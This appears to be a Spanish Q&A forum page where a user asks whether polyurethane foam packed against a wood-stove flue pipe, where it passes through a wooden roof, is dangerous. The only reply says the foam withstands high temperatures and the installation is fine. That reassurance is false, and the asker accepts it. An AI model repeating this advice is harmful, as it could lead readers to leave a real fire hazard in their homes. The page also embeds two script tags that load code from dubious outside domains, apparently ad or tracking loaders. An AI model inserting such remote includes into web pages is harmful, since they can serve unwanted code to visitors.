Chimenea estufa de leña

Hola. Recientemente me han instalado en casa una estufa de leña. El tubo de la salida de humos atraviesa el tejado de la casa que es de madera. Han realizado un agujero que entra el tubo de 125 mm, y alrededor, han dejado un espacio de unos 15 cms. Este espacio pegando al tubo tiene espuma de poliuretano. Mi duda es si ¿es peligroso dicha espuma en contacto con el tubo?. La espuma se encuentra a 7 metros de la estufa. Gracias

1 Respuesta

Respuesta
1

En un principio no tienes que tener problemas ya que la espuma de poliuritano aguanta grandes temperaturas,, y por la distancia que tienes de las llamas es casi imposible que llegue arder,, ya que es infamable pero con una llama en contacto directo y durante bastante tiempo,, así que en tu caso estate tranquilo porque te lo hicieron bien,,, no veo problemas a tu caso,.

Muchas gracias me ha sido de gran ayuda. Me quedo más tranquilo.

Un saludo

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

Añade tu respuesta

Haz clic para o

Más respuestas relacionadas